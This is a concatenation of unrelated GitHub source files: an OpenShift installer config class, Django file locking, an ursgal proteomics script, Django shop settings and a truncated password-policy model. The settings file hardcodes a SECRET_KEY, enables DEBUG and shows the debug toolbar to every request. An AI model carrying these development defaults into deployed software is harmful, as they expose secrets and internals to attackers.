"repo_name": "jortizcs/machine-learning",
"id": "47f3e1cfb6d3ddb73fb1aaafc30590f8641d2717",
"size": "6501",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "courses/udacity/linearAlgebra/line.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "3461"
},
{
"name": "Jupyter Notebook",
"bytes": "24642"
},
{
"name": "Python",
"bytes": "69458"
},
{
"name": "Shell",
"bytes": "3244"
}
],
"symlink_target": ""
}
|
import os
import yaml
from pkg_resources import resource_filename
PERSIST_SETTINGS = [
'ansible_ssh_user',
'ansible_config',
'ansible_log_path',
'master_routingconfig_subdomain',
'variant',
'variant_version',
'version',
]
DEFAULT_REQUIRED_FACTS = ['ip', 'public_ip', 'hostname', 'public_hostname']
PRECONFIGURED_REQUIRED_FACTS = ['hostname', 'public_hostname']
class OOConfigFileError(Exception):
"""The provided config file path can't be read/written
"""
pass
class OOConfigInvalidHostError(Exception):
""" Host in config is missing both ip and hostname. """
pass
class Host(object):
""" A system we will or have installed OpenShift on. """
def __init__(self, **kwargs):
self.ip = kwargs.get('ip', None)
self.hostname = kwargs.get('hostname', None)
self.public_ip = kwargs.get('public_ip', None)
self.public_hostname = kwargs.get('public_hostname', None)
self.connect_to = kwargs.get('connect_to', None)
self.preconfigured = kwargs.get('preconfigured', None)
self.new_host = kwargs.get('new_host', None)
# Should this host run as an OpenShift master:
self.master = kwargs.get('master', False)
# Should this host run as an OpenShift node:
self.node = kwargs.get('node', False)
# Should this host run as an HAProxy:
self.master_lb = kwargs.get('master_lb', False)
        # Should this host run as a storage host:
self.storage = kwargs.get('storage', False)
self.containerized = kwargs.get('containerized', False)
if self.connect_to is None:
raise OOConfigInvalidHostError("You must specify either an ip " \
"or hostname as 'connect_to'")
if self.master is False and self.node is False and \
self.master_lb is False and self.storage is False:
raise OOConfigInvalidHostError(
"You must specify each host as either a master or a node.")
def __str__(self):
return self.connect_to
def __repr__(self):
return self.connect_to
def to_dict(self):
""" Used when exporting to yaml. """
d = {}
for prop in ['ip', 'hostname', 'public_ip', 'public_hostname',
'master', 'node', 'master_lb', 'storage', 'containerized',
'connect_to', 'preconfigured', 'new_host']:
# If the property is defined (not None or False), export it:
if getattr(self, prop):
d[prop] = getattr(self, prop)
return d
def is_etcd_member(self, all_hosts):
""" Will this host be a member of a standalone etcd cluster. """
if not self.master:
return False
masters = [host for host in all_hosts if host.master]
if len(masters) > 1:
return True
return False
def is_dedicated_node(self):
""" Will this host be a dedicated node. (not a master) """
return self.node and not self.master
def is_schedulable_node(self, all_hosts):
""" Will this host be a node marked as schedulable. """
if not self.node:
return False
if not self.master:
return True
masters = [host for host in all_hosts if host.master]
nodes = [host for host in all_hosts if host.node]
if len(masters) == len(nodes):
return True
return False
class OOConfig(object):
default_dir = os.path.normpath(
os.environ.get('XDG_CONFIG_HOME',
os.environ['HOME'] + '/.config/') + '/openshift/')
default_file = '/installer.cfg.yml'
def __init__(self, config_path):
if config_path:
self.config_path = os.path.normpath(config_path)
else:
self.config_path = os.path.normpath(self.default_dir +
self.default_file)
self.settings = {}
self._read_config()
self._set_defaults()
def _read_config(self):
self.hosts = []
try:
if os.path.exists(self.config_path):
cfgfile = open(self.config_path, 'r')
self.settings = yaml.safe_load(cfgfile.read())
cfgfile.close()
# Use the presence of a Description as an indicator this is
# a legacy config file:
if 'Description' in self.settings:
self._upgrade_legacy_config()
# Parse the hosts into DTO objects:
if 'hosts' in self.settings:
for host in self.settings['hosts']:
self.hosts.append(Host(**host))
            # Watch out for the variant_version coming in as a float:
if 'variant_version' in self.settings:
self.settings['variant_version'] = \
str(self.settings['variant_version'])
except IOError, ferr:
raise OOConfigFileError('Cannot open config file "{}": {}'.format(ferr.filename,
ferr.strerror))
except yaml.scanner.ScannerError:
raise OOConfigFileError(
'Config file "{}" is not a valid YAML document'.format(self.config_path))
def _upgrade_legacy_config(self):
new_hosts = []
remove_settings = ['validated_facts', 'Description', 'Name',
'Subscription', 'Vendor', 'Version', 'masters', 'nodes']
if 'validated_facts' in self.settings:
for key, value in self.settings['validated_facts'].iteritems():
value['connect_to'] = key
if 'masters' in self.settings and key in self.settings['masters']:
value['master'] = True
if 'nodes' in self.settings and key in self.settings['nodes']:
value['node'] = True
new_hosts.append(value)
self.settings['hosts'] = new_hosts
for s in remove_settings:
if s in self.settings:
del self.settings[s]
# A legacy config implies openshift-enterprise 3.0:
self.settings['variant'] = 'openshift-enterprise'
self.settings['variant_version'] = '3.0'
def _set_defaults(self):
if 'ansible_inventory_directory' not in self.settings:
self.settings['ansible_inventory_directory'] = \
self._default_ansible_inv_dir()
if not os.path.exists(self.settings['ansible_inventory_directory']):
os.makedirs(self.settings['ansible_inventory_directory'])
if 'ansible_plugins_directory' not in self.settings:
self.settings['ansible_plugins_directory'] = \
resource_filename(__name__, 'ansible_plugins')
if 'version' not in self.settings:
self.settings['version'] = 'v1'
if 'ansible_callback_facts_yaml' not in self.settings:
self.settings['ansible_callback_facts_yaml'] = '%s/callback_facts.yaml' % \
self.settings['ansible_inventory_directory']
if 'ansible_ssh_user' not in self.settings:
self.settings['ansible_ssh_user'] = ''
self.settings['ansible_inventory_path'] = \
'{}/hosts'.format(self.settings['ansible_inventory_directory'])
# clean up any empty sets
for setting in self.settings.keys():
if not self.settings[setting]:
self.settings.pop(setting)
def _default_ansible_inv_dir(self):
return os.path.normpath(
os.path.dirname(self.config_path) + "/.ansible")
def calc_missing_facts(self):
"""
Determine which host facts are not defined in the config.
Returns a hash of host to a list of the missing facts.
"""
result = {}
for host in self.hosts:
missing_facts = []
if host.preconfigured:
required_facts = PRECONFIGURED_REQUIRED_FACTS
else:
required_facts = DEFAULT_REQUIRED_FACTS
for required_fact in required_facts:
if not getattr(host, required_fact):
missing_facts.append(required_fact)
if len(missing_facts) > 0:
result[host.connect_to] = missing_facts
return result
def save_to_disk(self):
out_file = open(self.config_path, 'w')
out_file.write(self.yaml())
out_file.close()
def persist_settings(self):
p_settings = {}
for setting in PERSIST_SETTINGS:
if setting in self.settings and self.settings[setting]:
p_settings[setting] = self.settings[setting]
p_settings['hosts'] = []
for host in self.hosts:
p_settings['hosts'].append(host.to_dict())
if self.settings['ansible_inventory_directory'] != \
self._default_ansible_inv_dir():
p_settings['ansible_inventory_directory'] = \
self.settings['ansible_inventory_directory']
return p_settings
def yaml(self):
return yaml.safe_dump(self.persist_settings(), default_flow_style=False)
def __str__(self):
return self.yaml()
def get_host(self, name):
for host in self.hosts:
if host.connect_to == name:
return host
return None
|
{
"content_hash": "31c6ecd1958b8d0fe70c8dc7605c6fcf",
"timestamp": "",
"source": "github",
"line_count": 261,
"max_line_length": 93,
"avg_line_length": 36.24904214559387,
"alnum_prop": 0.5681217630271641,
"repo_name": "BlueShells/openshift-ansible",
"id": "c9498542f7e292d4c9ac8df8dcb36c4d09faa394",
"size": "9711",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "utils/src/ooinstall/oo_config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "287707"
},
{
"name": "Ruby",
"bytes": "3270"
},
{
"name": "Shell",
"bytes": "10372"
},
{
"name": "VimL",
"bytes": "459"
}
],
"symlink_target": ""
}
|
"""
Portable file locking utilities.
Based partially on an example by Jonathan Feinberg in the Python
Cookbook [1] (licensed under the Python Software License) and a ctypes port by
Anatoly Techtonik for Roundup [2] (license [3]).
[1] http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/65203
[2] http://sourceforge.net/p/roundup/code/ci/default/tree/roundup/backends/portalocker.py
[3] http://sourceforge.net/p/roundup/code/ci/default/tree/COPYING.txt
Example Usage::
>>> from django.core.files import locks
>>> with open('./file', 'wb') as f:
... locks.lock(f, locks.LOCK_EX)
... f.write('Django')
"""
import os
__all__ = ('LOCK_EX', 'LOCK_SH', 'LOCK_NB', 'lock', 'unlock')
def _fd(f):
"""Get a filedescriptor from something which could be a file or an fd."""
return f.fileno() if hasattr(f, 'fileno') else f
if os.name == 'nt':
import msvcrt
from ctypes import (sizeof, c_ulong, c_void_p, c_int64,
Structure, Union, POINTER, windll, byref)
from ctypes.wintypes import BOOL, DWORD, HANDLE
LOCK_SH = 0 # the default
LOCK_NB = 0x1 # LOCKFILE_FAIL_IMMEDIATELY
LOCK_EX = 0x2 # LOCKFILE_EXCLUSIVE_LOCK
# --- Adapted from the pyserial project ---
# detect size of ULONG_PTR
if sizeof(c_ulong) != sizeof(c_void_p):
ULONG_PTR = c_int64
else:
ULONG_PTR = c_ulong
PVOID = c_void_p
# --- Union inside Structure by stackoverflow:3480240 ---
class _OFFSET(Structure):
_fields_ = [
('Offset', DWORD),
('OffsetHigh', DWORD)]
class _OFFSET_UNION(Union):
_anonymous_ = ['_offset']
_fields_ = [
('_offset', _OFFSET),
('Pointer', PVOID)]
class OVERLAPPED(Structure):
_anonymous_ = ['_offset_union']
_fields_ = [
('Internal', ULONG_PTR),
('InternalHigh', ULONG_PTR),
('_offset_union', _OFFSET_UNION),
('hEvent', HANDLE)]
LPOVERLAPPED = POINTER(OVERLAPPED)
# --- Define function prototypes for extra safety ---
LockFileEx = windll.kernel32.LockFileEx
LockFileEx.restype = BOOL
LockFileEx.argtypes = [HANDLE, DWORD, DWORD, DWORD, DWORD, LPOVERLAPPED]
UnlockFileEx = windll.kernel32.UnlockFileEx
UnlockFileEx.restype = BOOL
UnlockFileEx.argtypes = [HANDLE, DWORD, DWORD, DWORD, LPOVERLAPPED]
def lock(f, flags):
hfile = msvcrt.get_osfhandle(_fd(f))
overlapped = OVERLAPPED()
ret = LockFileEx(hfile, flags, 0, 0, 0xFFFF0000, byref(overlapped))
return bool(ret)
def unlock(f):
hfile = msvcrt.get_osfhandle(_fd(f))
overlapped = OVERLAPPED()
ret = UnlockFileEx(hfile, 0, 0, 0xFFFF0000, byref(overlapped))
return bool(ret)
else:
try:
import fcntl
LOCK_SH = fcntl.LOCK_SH # shared lock
LOCK_NB = fcntl.LOCK_NB # non-blocking
LOCK_EX = fcntl.LOCK_EX
except (ImportError, AttributeError):
# File locking is not supported.
LOCK_EX = LOCK_SH = LOCK_NB = 0
# Dummy functions that don't do anything.
def lock(f, flags):
# File is not locked
return False
def unlock(f):
# File is unlocked
return True
else:
def lock(f, flags):
ret = fcntl.flock(_fd(f), flags)
return ret == 0
def unlock(f):
ret = fcntl.flock(_fd(f), fcntl.LOCK_UN)
return ret == 0
|
{
"content_hash": "944137ba4020bfa3967d854cc12cf22d",
"timestamp": "",
"source": "github",
"line_count": 113,
"max_line_length": 89,
"avg_line_length": 31.079646017699115,
"alnum_prop": 0.5945330296127562,
"repo_name": "treyhunner/django",
"id": "63c7fda9bbb7f865ed2482bc6621fc278e2bd9ce",
"size": "3512",
"binary": false,
"copies": "27",
"ref": "refs/heads/master",
"path": "django/core/files/locks.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "84168"
},
{
"name": "HTML",
"bytes": "224612"
},
{
"name": "JavaScript",
"bytes": "255642"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "12359346"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
}
|
import ursgal
import os
def main():
"""
    Script to compare Percolator versions 2.08 and 3.2 using X!Tandem
    (Vengeance) as search engine
"""
engine_list = [
"xtandem_vengeance",
]
params = {
"database": os.path.join(
os.pardir,
"example_data",
"Creinhardtii_281_v5_5_CP_MT_with_contaminants_target_decoy.fasta",
),
"modifications": [],
"csv_filter_rules": [["PEP", "lte", 0.01], ["Is decoy", "equals", "false"]],
"ftp_url": "ftp.peptideatlas.org",
"ftp_login": "PASS00269",
"ftp_password": "FI4645a",
"ftp_include_ext": [
"JB_FASP_pH8_2-3_28122012.mzML",
],
"ftp_output_folder": os.path.join(
os.pardir, "example_data", "percolator_version_comparison"
),
"http_url": "https://www.sas.upenn.edu/~sschulze/Creinhardtii_281_v5_5_CP_MT_with_contaminants_target_decoy.fasta",
"http_output_folder": os.path.join(os.pardir, "example_data"),
"infer_proteins": False,
"percolator_post_processing": "tdc",
}
if os.path.exists(params["ftp_output_folder"]) is False:
os.mkdir(params["ftp_output_folder"])
uc = ursgal.UController(profile="LTQ XL low res", params=params)
mzML_file = os.path.join(params["ftp_output_folder"], params["ftp_include_ext"][0])
if os.path.exists(mzML_file) is False:
uc.fetch_file(engine="get_ftp_files_1_0_0")
if os.path.exists(params["database"]) is False:
uc.fetch_file(engine="get_http_files_1_0_0")
validation_engine_list = ["percolator_2_08", "percolator_3_2_1"]
uc.params["visualization_label_positions"] = {}
for n, vce in enumerate(validation_engine_list):
uc.params["visualization_label_positions"][str(n)] = vce
for engine in engine_list:
unified_search_results = uc.search(
input_file=mzML_file,
engine=engine,
)
validated_and_filtered_files_list = []
for pc_version in validation_engine_list:
uc.params["prefix"] = pc_version
validated_file = uc.validate(
input_file=unified_search_results,
engine=pc_version,
)
filtered_file = uc.execute_misc_engine(
input_file=validated_file, engine="filter_csv"
)
validated_and_filtered_files_list.append(filtered_file)
uc.visualize(
input_files=validated_and_filtered_files_list,
engine="venndiagram_1_1_0",
)
return
if __name__ == "__main__":
main()
|
{
"content_hash": "226c769be0135c7572fd8ea2c3787e05",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 123,
"avg_line_length": 33.666666666666664,
"alnum_prop": 0.5784463061690784,
"repo_name": "ursgal/ursgal",
"id": "b56a4b606ef39ec13d0b2dc2ee54c1beef74156a",
"size": "2668",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "example_scripts/compare_percolator_versions.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "2330138"
},
{
"name": "Shell",
"bytes": "780"
}
],
"symlink_target": ""
}
|
def main(j,jp):
recipe=jp.getCodeMgmtRecipe()
recipe.commit()
|
{
"content_hash": "5f4200e632955e658abfd222713b026b",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 33,
"avg_line_length": 17.75,
"alnum_prop": 0.6619718309859155,
"repo_name": "Jumpscale/jumpscale6_core",
"id": "6faf358b717dd7c40300b487620b290f1feed803",
"size": "141",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/JumpScale/baselib/jpackages/templates/actions/code.commit.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "3681"
},
{
"name": "HTML",
"bytes": "11738"
},
{
"name": "JavaScript",
"bytes": "70132"
},
{
"name": "Lua",
"bytes": "2162"
},
{
"name": "Python",
"bytes": "5848017"
},
{
"name": "Shell",
"bytes": "7692"
}
],
"symlink_target": ""
}
|
"""
Django settings for shop_lite project.
Generated by 'django-admin startproject' using Django 1.8.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.conf import global_settings
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-s$1@e-(sq5s@#s+2aj3m+bsj7kz76j2c6uab3x@5l&s53#rim'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django_admin_bootstrapped',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
'debug_toolbar',
'django_extensions',
'cart',
'changuito',
'crispy_forms',
'taggit',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
# Changuito Middleware
'changuito.middleware.CartMiddleware',
)
ROOT_URLCONF = 'shop_lite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
# insert your TEMPLATE_DIRS here
BASE_DIR,
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request',
],
},
},
]
WSGI_APPLICATION = 'shop_lite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.getenv('DATABASE_NAME', 'shop_lite'),
'USER': os.getenv('DATABASE_USER', 'shop_lite'),
'PASSWORD': os.getenv('DATABASE_PASSWORD', 'password'),
'HOST': os.getenv('DATABASE_HOST', '127.0.0.1'),
'PORT': os.getenv('DATABASE_PORT', '5432'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
#'/var/www/static/',
)
## Begin Django Debug ToolBar Settings
##
def show_toolbar(request):
return True
DEBUG_TOOLBAR_CONFIG = {
"SHOW_TOOLBAR_CALLBACK" : show_toolbar,
}
DEBUG_TOOLBAR_PANELS = [
'debug_toolbar.panels.versions.VersionsPanel',
'debug_toolbar.panels.timer.TimerPanel',
'debug_toolbar.panels.settings.SettingsPanel',
'debug_toolbar.panels.headers.HeadersPanel',
'debug_toolbar.panels.request.RequestPanel',
'debug_toolbar.panels.sql.SQLPanel',
'debug_toolbar.panels.staticfiles.StaticFilesPanel',
'debug_toolbar.panels.templates.TemplatesPanel',
'debug_toolbar.panels.cache.CachePanel',
'debug_toolbar.panels.signals.SignalsPanel',
'debug_toolbar.panels.logging.LoggingPanel',
'debug_toolbar.panels.redirects.RedirectsPanel',
#'debug_toolbar_session_panel.panels.SessionDebugPanel',
]
## End Django Debug toolbar settings
BOOTSTRAP_ADMIN_SIDEBAR_MENU = True
|
{
"content_hash": "b73c9babb9931f3311ff8c63c45a77a5",
"timestamp": "",
"source": "github",
"line_count": 169,
"max_line_length": 71,
"avg_line_length": 26.680473372781066,
"alnum_prop": 0.6801951652251054,
"repo_name": "sidja/Django_Shop_Lite",
"id": "1ee58bca7df287ced6b4f281c8c86aa7d948dfc9",
"size": "4509",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "shop_lite/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "11026"
},
{
"name": "HTML",
"bytes": "43928"
},
{
"name": "JavaScript",
"bytes": "6873"
},
{
"name": "Python",
"bytes": "56579"
},
{
"name": "Shell",
"bytes": "1573"
}
],
"symlink_target": ""
}
|
from copy import copy
from tornado.testing import gen_test
from tornado.web import Application
from . import RESTTestHandler
from .server import AsyncRESTTestCase
class Handler(RESTTestHandler):
COOKIES = [
(('foo', 'baz'), dict(expires_days=20)),
(('bar', '*'), dict(expires_days=20)),
(('spam', 'egg'), dict()),
]
def get(self, *args, **kwargs):
for args, kwargs in self.COOKIES:
self.set_cookie(*args, **kwargs)
self.response({})
def post(self, *args, **kwargs):
assert self.get_cookie('foo') == 'baz'
assert self.get_cookie('bar') == '*'
assert self.get_cookie('spam') == 'egg'
self.response({})
class TestCopy(AsyncRESTTestCase):
def get_app(self):
return Application(handlers=[
('/', Handler),
])
@gen_test
def test_copy(self):
client = self.get_http_client()
yield client.get(self.api_url.format("/"))
clone = copy(client)
assert client is not clone
yield clone.post(self.api_url.format("/"), body={})
|
{
"content_hash": "0a8ab1f793b304f4ee075efa526aa415",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 59,
"avg_line_length": 23.97826086956522,
"alnum_prop": 0.5747960108794198,
"repo_name": "mosquito/rest-client",
"id": "03a5cd7cc7f3d472c5b9a123eb3bea073da17fb4",
"size": "1143",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_copy.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "20043"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, division, print_function, unicode_literals
from amaascore.corporate_actions.corporate_action import CorporateAction
class Split(CorporateAction):
def __init__(self, asset_manager_id, corporate_action_id, record_date, ratio, corporate_action_status='Open',
asset_id=None, party_id=None, declared_date=None, settlement_date=None, elective=False, message=None,
description='', references=None, *args, **kwargs):
self.ratio = ratio
super(Split, self).__init__(asset_manager_id=asset_manager_id, corporate_action_id=corporate_action_id,
record_date=record_date, corporate_action_status=corporate_action_status,
asset_id=asset_id, party_id=party_id, declared_date=declared_date,
settlement_date=settlement_date, elective=elective, message=message,
description=description, references=references, *args, **kwargs)
@property
def ratio(self):
if hasattr(self, '_ratio'):
return self._ratio
@ratio.setter
def ratio(self, ratio):
"""
The split ratio of the corporate action - i.e. the ratio of new shares to old shares
:param ratio: A tuple representing (original_count, new_count). For example (1, 2) is a doubling stock split.
(3, 1) is a 3:1 reverse stock split.
:return:
"""
if isinstance(ratio, tuple):
self._ratio = ratio
else:
raise TypeError('Invalid ratio type: %s' % type(ratio))
|
{
"content_hash": "2d6141cb8618b382bcf2ab98646b3ac6",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 118,
"avg_line_length": 48.470588235294116,
"alnum_prop": 0.6122572815533981,
"repo_name": "amaas-fintech/amaas-core-sdk-python",
"id": "7e7e5bd60945097fc16f38bc5cd38546382b7031",
"size": "1648",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "amaascore/corporate_actions/split.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "618"
},
{
"name": "Python",
"bytes": "529460"
},
{
"name": "Shell",
"bytes": "42"
}
],
"symlink_target": ""
}
|
from trainer_config import TrainerConfig
from config import GeneralConfig
|
{
"content_hash": "a734e82e3aecb5bd41b2e726d5631005",
"timestamp": "",
"source": "github",
"line_count": 2,
"max_line_length": 40,
"avg_line_length": 36.5,
"alnum_prop": 0.8904109589041096,
"repo_name": "uaca/deepy",
"id": "e9fcda1f17d18bd993d4fa7ca0b7419ea736cbf4",
"size": "120",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "deepy/conf/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "15998"
},
{
"name": "Jupyter Notebook",
"bytes": "99240"
},
{
"name": "Python",
"bytes": "273397"
},
{
"name": "Shell",
"bytes": "515"
}
],
"symlink_target": ""
}
|
"""Saves a SavedModel after TensorRT conversion.
The saved model is loaded and executed by tests to ensure backward
compatibility across TF versions.
The script may not work in TF1.x.
Instructions on how to use this script:
- Execute the script as follows:
  python gen_tftrt_model.py
- Rename tftrt_saved_model to what makes sense for your test.
- Delete directory tf_saved_model unless you want to use it.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python import Session
from tensorflow.python.compiler.tensorrt import trt_convert
from tensorflow.python.eager import def_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variables
from tensorflow.python.saved_model import builder
from tensorflow.python.saved_model import save
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.saved_model import signature_def_utils
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.saved_model import utils
from tensorflow.python.training.tracking import tracking
def GetGraph(input1, input2, var):
"""Define graph."""
add = input1 + var
mul = input1 * add
add = mul + add
add = add + input2
out = array_ops.identity(add, name="output")
return out
def GenerateModelV2(tf_saved_model_dir, tftrt_saved_model_dir):
"""Generate and convert a model using TFv2 API."""
class SimpleModel(tracking.AutoTrackable):
"""Define model with a TF function."""
def __init__(self):
self.v = None
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=[None, 1, 1], dtype=dtypes.float32),
tensor_spec.TensorSpec(shape=[None, 1, 1], dtype=dtypes.float32)
])
def run(self, input1, input2):
if self.v is None:
self.v = variables.Variable([[[1.0]]], dtype=dtypes.float32)
return GetGraph(input1, input2, self.v)
root = SimpleModel()
# Saved TF model
# pylint: disable=not-callable
save(
root,
tf_saved_model_dir,
{signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY: root.run})
# Convert TF model to TensorRT
converter = trt_convert.TrtGraphConverterV2(
input_saved_model_dir=tf_saved_model_dir)
converter.convert()
converter.save(tftrt_saved_model_dir)
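# Hedged sketch (editor's addition): one way a test could reload the converted
# SavedModel and run inference. LoadAndInferV2 is not part of the original
# script; it uses the public SavedModel loader, and the input names follow the
# argument names of SimpleModel.run above. Running it requires a
# TensorRT-enabled TensorFlow build.
def LoadAndInferV2(tftrt_saved_model_dir):
  """Reload the TF-TRT SavedModel and invoke its serving signature once."""
  import tensorflow as tf  # local import keeps the sketch self-contained
  loaded = tf.saved_model.load(tftrt_saved_model_dir)
  infer = loaded.signatures["serving_default"]
  # Shapes match the TensorSpecs declared in SimpleModel.run: [None, 1, 1].
  result = infer(input1=tf.constant([[[1.0]]]), input2=tf.constant([[[2.0]]]))
  return result  # dict mapping the signature's output key to the output tensor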
def GenerateModelV1(tf_saved_model_dir, tftrt_saved_model_dir):
"""Generate and convert a model using TFv1 API."""
def SimpleModel():
"""Define model with a TF graph."""
def GraphFn():
input1 = array_ops.placeholder(
dtype=dtypes.float32, shape=[None, 1, 1], name="input1")
input2 = array_ops.placeholder(
dtype=dtypes.float32, shape=[None, 1, 1], name="input2")
var = variables.Variable([[[1.0]]], dtype=dtypes.float32, name="v1")
out = GetGraph(input1, input2, var)
return g, var, input1, input2, out
g = ops.Graph()
with g.as_default():
return GraphFn()
g, var, input1, input2, out = SimpleModel()
signature_def = signature_def_utils.build_signature_def(
inputs={
"input1": utils.build_tensor_info(input1),
"input2": utils.build_tensor_info(input2)
},
outputs={"output": utils.build_tensor_info(out)},
method_name=signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY)
saved_model_builder = builder.SavedModelBuilder(tf_saved_model_dir)
with Session(graph=g) as sess:
sess.run(var.initializer)
saved_model_builder.add_meta_graph_and_variables(
sess, [tag_constants.SERVING],
signature_def_map={
signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY: signature_def
})
saved_model_builder.save()
# Convert TF model to TensorRT
converter = trt_convert.TrtGraphConverter(
input_saved_model_dir=tf_saved_model_dir, is_dynamic_op=True)
converter.convert()
converter.save(tftrt_saved_model_dir)
if __name__ == "__main__":
GenerateModelV2(
tf_saved_model_dir="tf_saved_model",
tftrt_saved_model_dir="tftrt_saved_model")
|
{
"content_hash": "53c0a9ea36433b6b10170b5e89c02763",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 80,
"avg_line_length": 33.72222222222222,
"alnum_prop": 0.704165686043775,
"repo_name": "frreiss/tensorflow-fred",
"id": "40b0e6ac29640908a3182d5169f835fa80694ef0",
"size": "4937",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tensorflow/python/compiler/tensorrt/test/testdata/gen_tftrt_model.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "6729"
},
{
"name": "Batchfile",
"bytes": "49527"
},
{
"name": "C",
"bytes": "871761"
},
{
"name": "C#",
"bytes": "8562"
},
{
"name": "C++",
"bytes": "79093233"
},
{
"name": "CMake",
"bytes": "6500"
},
{
"name": "Dockerfile",
"bytes": "110545"
},
{
"name": "Go",
"bytes": "1852128"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "961600"
},
{
"name": "Jupyter Notebook",
"bytes": "549457"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "1644156"
},
{
"name": "Makefile",
"bytes": "62398"
},
{
"name": "Objective-C",
"bytes": "116558"
},
{
"name": "Objective-C++",
"bytes": "303063"
},
{
"name": "PHP",
"bytes": "20523"
},
{
"name": "Pascal",
"bytes": "3982"
},
{
"name": "Pawn",
"bytes": "18876"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "40003007"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Roff",
"bytes": "2472"
},
{
"name": "Ruby",
"bytes": "7464"
},
{
"name": "Shell",
"bytes": "681596"
},
{
"name": "Smarty",
"bytes": "34740"
},
{
"name": "Swift",
"bytes": "62814"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
}
|
from libraries import db_helper
from localsys.storage import db
class pw_policy_model:
# Notice that the values provided here are for password policy only.
# Values for other policies are available in models\policies.py
ranges = {"plen": [0, 6, 8, 10, 12],
"psets": [1, 2, 3, 4],
"pdict": [0, 1],
"phist": [1, 2, 3, 4],
"prenew": [0, 1, 2, 3],
"pattempts": [0, 1, 2],
"precovery": [0, 1, 2]}
bounds = {"plen": [0, 6, 12], # 0 means disabled
"psets": [1, 4],
"pdict": [0, 1], # categorical, thus same as range
"phist": [1, 4],
"prenew": [0, 3],
"pattempts": [0, 1, 2], # categorical, thus same as range
